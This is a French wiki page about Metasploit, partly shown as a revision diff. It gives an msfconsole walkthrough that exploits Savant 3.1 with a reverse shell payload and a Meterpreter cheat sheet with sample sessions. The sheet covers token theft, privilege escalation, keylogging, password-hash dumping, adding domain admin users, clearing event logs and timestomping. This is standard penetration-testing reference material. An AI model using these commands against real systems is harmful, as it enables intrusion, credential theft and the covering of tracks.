Metasploit

De Linuxmemo.

(Différences entre les versions)
Ligne 178 : Ligne 178 :
The 'hashdump' post module will dump the contents of the SAM database.
The 'hashdump' post module will dump the contents of the SAM database.
 +
 +
help
 +
 +
Open Meterpreter usage help
 +
 +
run scriptname
 +
 +
Run Meterpreter-based scripts; for a full list check the scripts/meterpreter
 +
directory
 +
 +
sysinfo
 +
 +
Show the system information on the remote target
 +
 +
ls
 +
 +
List the files and folders on the target
 +
 +
use priv
 +
 +
Load the privilege extension for extended Meterpreter libraries
 +
 +
ps
 +
 +
Show all running processes and which accounts are associated with each process
 +
 +
migrate PID
 +
 +
Migrate to the specific process ID (PID is the target process ID gained
 +
from the ps command)
 +
 +
use incognito
 +
 +
Load incognito functions. (Used for token stealing and impersonation on
 +
a target machine)
 +
 +
list_tokens -u
 +
 +
List available tokens on the target by user
 +
 +
list_tokens -g
 +
 +
List available tokens on the target by group
 +
 +
impersonate_token DOMAIN_NAME\\USERNAME
 +
 +
Impersonate a token available on the target
 +
 +
steal_token PID
 +
 +
Steal the tokens available for a given process and impersonate that token
 +
 +
drop_token
 +
 +
Stop impersonating the current token
 +
 +
getsystem
 +
 +
Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors
 +
 +
shell
 +
 +
Drop into an interactive shell with all available tokens
 +
 +
execute -f cmd.exe -i
 +
 +
Execute cmd.exe and interact with it
 +
 +
execute -f cmd.exe -i -t
 +
 +
Execute cmd.exe with all available tokens
 +
 +
execute -f cmd.exe -i -H -t
 +
 +
Execute cmd.exe with all available tokens and make it a hidden process
 +
 +
rev2self
 +
 +
Revert back to the original user you used to compromise the target
 +
 +
reg command
 +
 +
Interact, create, delete, query, set, and much more in the target’s registry
 +
 +
setdesktop number
 +
 +
Switch to a different screen based on who is logged in
 +
 +
screenshot
 +
 +
Take a screenshot of the target’s screen
 +
 +
upload file
 +
 +
Upload a file to the target
 +
 +
download file
 +
 +
Download a file from the target
 +
 +
keyscan_start
 +
 +
Start sniffing keystrokes on the remote target
 +
 +
keyscan_dump
 +
 +
Dump the remote keys captured on the target
 +
 +
keyscan_stop
 +
 +
Stop sniffing keystrokes on the remote target
 +
 +
getprivs
 +
 +
Get as many privileges as possible on the target
 +
 +
uictl enable keyboard/mouse
 +
 +
Take control of the keyboard and/or mouse
 +
 +
background
 +
 +
Run your current Meterpreter shell in the background
 +
 +
hashdump
 +
 +
Dump all hashes on the target
 +
 +
use sniffer
 +
 +
Load the sniffer module
 +
 +
sniffer_interfaces
 +
 +
List the available interfaces on the target
 +
 +
sniffer_dump interfaceID pcapname
 +
 +
Start sniffing on the remote target
 +
 +
sniffer_start interfaceID packet-buffer
 +
 +
Start sniffing with a specific range for a packet buffer
 +
 +
sniffer_stats interfaceID
 +
 +
Grab statistical information from the interface you are sniffing
 +
 +
sniffer_stop interfaceID
 +
 +
Stop the sniffer
 +
 +
add_user username password -h ip
 +
 +
Add a user on the remote target
 +
 +
add_group_user “Domain Admins” username -h ip
 +
 +
Add a username to the Domain Administrators group on the remote target
 +
 +
clearev
 +
 +
Clear the event log on the target machine
 +
 +
timestomp
 +
 +
Change file attributes, such as creation date (antiforensics measure)
 +
 +
reboot
 +
 +
Reboot the target machine

Version du 29 août 2012 à 13:40


shell

help, info, set, show et use. 

show exploits
search 
use windows/http/savant_31_overflow
show options
set RHOST 192.168.1.5
show targets
set TARGET 0
show payloads
set PAYLOAD windows/shell/reverse_nonx_tcp
show options
exploit

show options Affiche la liste des options et valeurs courantes (celles spécifiées avec la commande set)

show exploits Affiche la liste des exploits

show targets Affiche la liste des cibles

show payloads Affiche la liste des payloads disponibles

show advanced Affiche les options avancées

Arborescence des modules

Auxiliary La version 3.0 supporte le concept de modules auxiliaires qui peuvent être utilisés afin d'exécuter des actions arbitraires telles que le scan de ports, le déni de services entre autres.

Encoder

Exploit Les modules "Exploit" sont les modules principaux dans Metasploit.

Nop Les modules NOP sont utilisés pour les instructions de type "no-operation" pour exploiter les débordements de buffers.

Payload Les charges utilies (Payload en anglais) sont des portions de code (shellcode) exécutées lorsque l'exploit réussi. Les charges utiles permettent d'assurrer la communication entre Metasploit et la victime.

meterpreter

  • help 
The 'help' command, as may be expected, displays the Meterpreter help menu.
meterpreter > help
Core Commands
=============

   Command       Description
   -------       -----------
   ?             Help menu
   background    Backgrounds the current session
   channel       Displays information about active channels
...snip...


  • background 
The 'background' command will send the current Meterpreter session to the background and return you to the msf prompt. To get back to your Meterpreter session, just interact with it again.
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
  • ps 
The 'ps' command displays a list of running processes on the target.
meterpreter > ps
Process list
============

   PID   Name                  Path
   ---   ----                  ----
   132   VMwareUser.exe        C:\Program Files\VMware\VMware Tools\VMwareUser.exe
   152   VMwareTray.exe        C:\Program Files\VMware\VMware Tools\VMwareTray.exe
   288   snmp.exe              C:\WINDOWS\System32\snmp.exe
...snip...


  • migrate 
Using the 'migrate' post module, you can migrate to another process on the victim.
meterpreter > run post/windows/manage/migrate 
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >
  • ls 
As in Linux, the 'ls' command will list the files in the current remote directory.
meterpreter > ls
Listing: C:\Documents and Settings\victim
=========================================
Mode              Size     Type  Last modified                   Name
----              ----     ----  -------------                   ----
40777/rwxrwxrwx   0        dir   Sat Oct 17 07:40:45 -0600 2009  .
40777/rwxrwxrwx   0        dir   Fri Jun 19 13:30:00 -0600 2009  ..
100666/rw-rw-rw-  218      fil   Sat Oct 03 14:45:54 -0600 2009  .recently-used.xbel
40555/r-xr-xr-x   0        dir   Wed Nov 04 19:44:05 -0700 2009  Application Data
...snip...


  • download 
The 'download' command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path.
meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >


  • upload 
As with the 'download' command, you need to use double-slashes with the 'upload' command.
meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading  : evil_trojan.exe -> c:\windows\system32
[*] uploaded   : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
meterpreter >


  • ipconfig 
The 'ipconfig' command displays the network interfaces and addresses on the remote machine.
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address  : 192.168.1.104
Netmask     : 255.255.0.0
meterpreter >


  • getuid 
Running 'getuid' will display the user that the Meterpreter server is running as on the host.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >


  • execute 
The 'execute' command runs a command on the target.
meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>


  • shell 
The 'shell' command will present you with a standard shell on the target system.
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>


  • idletime 
Running 'idletime' will display the number of seconds that the user at the remote machine has been idle.
meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >


  • hashdump

The 'hashdump' post module will dump the contents of the SAM database.

help

Open Meterpreter usage help

run scriptname

Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory

sysinfo

Show the system information on the remote target

ls

List the files and folders on the target

use priv

Load the privilege extension for extended Meterpreter libraries

ps

Show all running processes and which accounts are associated with each process

migrate PID

Migrate to the specific process ID (PID is the target process ID gained from the ps command)

use incognito

Load incognito functions. (Used for token stealing and impersonation on a target machine)

list_tokens -u

List available tokens on the target by user

list_tokens -g

List available tokens on the target by group

impersonate_token DOMAIN_NAME\\USERNAME

Impersonate a token available on the target

steal_token PID

Steal the tokens available for a given process and impersonate that token

drop_token

Stop impersonating the current token

getsystem

Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors

shell

Drop into an interactive shell with all available tokens

execute -f cmd.exe -i

Execute cmd.exe and interact with it

execute -f cmd.exe -i -t

Execute cmd.exe with all available tokens

execute -f cmd.exe -i -H -t

Execute cmd.exe with all available tokens and make it a hidden process

rev2self

Revert back to the original user you used to compromise the target

reg command

Interact, create, delete, query, set, and much more in the target’s registry

setdesktop number

Switch to a different screen based on who is logged in

screenshot

Take a screenshot of the target’s screen

upload file

Upload a file to the target

download file

Download a file from the target

keyscan_start

Start sniffing keystrokes on the remote target

keyscan_dump

Dump the remote keys captured on the target

keyscan_stop

Stop sniffing keystrokes on the remote target

getprivs

Get as many privileges as possible on the target

uictl enable keyboard/mouse

Take control of the keyboard and/or mouse

background

Run your current Meterpreter shell in the background

hashdump

Dump all hashes on the target

use sniffer

Load the sniffer module

sniffer_interfaces

List the available interfaces on the target

sniffer_dump interfaceID pcapname

Start sniffing on the remote target

sniffer_start interfaceID packet-buffer

Start sniffing with a specific range for a packet buffer

sniffer_stats interfaceID

Grab statistical information from the interface you are sniffing

sniffer_stop interfaceID

Stop the sniffer

add_user username password -h ip

Add a user on the remote target

add_group_user “Domain Admins” username -h ip

Add a username to the Domain Administrators group on the remote target

clearev

Clear the event log on the target machine

timestomp

Change file attributes, such as creation date (antiforensics measure)

reboot

Reboot the target machine

Récupérée de « http://linuxmemo.free.fr/index.php?title=Metasploit »
Outils personnels